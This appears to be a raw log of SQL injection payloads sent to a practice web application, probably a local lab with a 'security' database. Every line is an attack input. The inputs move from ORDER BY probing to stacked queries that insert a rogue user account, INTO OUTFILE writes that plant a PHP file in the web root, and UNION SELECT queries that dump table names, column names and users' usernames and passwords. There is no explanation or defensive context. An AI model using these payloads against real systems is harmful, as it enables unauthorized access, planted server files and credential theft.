ID:1
ID:1
ID:1'
ID:1;
ID:1;order 1,2
ID:1;order  1,2
ID:1;order by  1,2
ID:1;order by 1
ID:1;order by 3
ID:1;order by 4
ID:1'order by 4
ID:1'order by 2
ID:1;
ID:1;show database()
ID:1;insert
ID:1'; insert into users(id,username,password) value (666,'sibom','sibom')-- 
ID:1'; insert into users(id,username,password) value (666,'sibom','sibom')-- 
ID:1'; insert into users(id,username,password) value (666,'sibomsun','sibom')-- 
ID:1?id=1’;select “<?php phpinfo(); ?>” into outfile php.php
ID:1?id=1’;select “<?php phpinfo(); ?>” into outfile sibom.php
ID:1?id=1’;select “<?php phpinfo(); ?>” into outfile D:\phpstudy\PHPTutorial\WWW\sibomsunsun.php
ID:1?id=1’;select “<?php phpinfo(); ?>” into outfile D:\phpstudy\PHPTutorial\WWW\sibomsunsun.php -- 
ID:1
ID:1'
ID:1'--=
ID:1'-- 
ID:1' union select 1,2,database(0-- 
ID:1' union select 1,2,database()-- 
ID:-1' union select 1,2,database()-- 
ID:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- 
ID:-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'-- 
ID:-1' union select 1,2,group_concat(username,";",password) from security.users-- 
ID:1' union select 1,2,database()-- 
ID:-1' union select 1,2,database()-- 
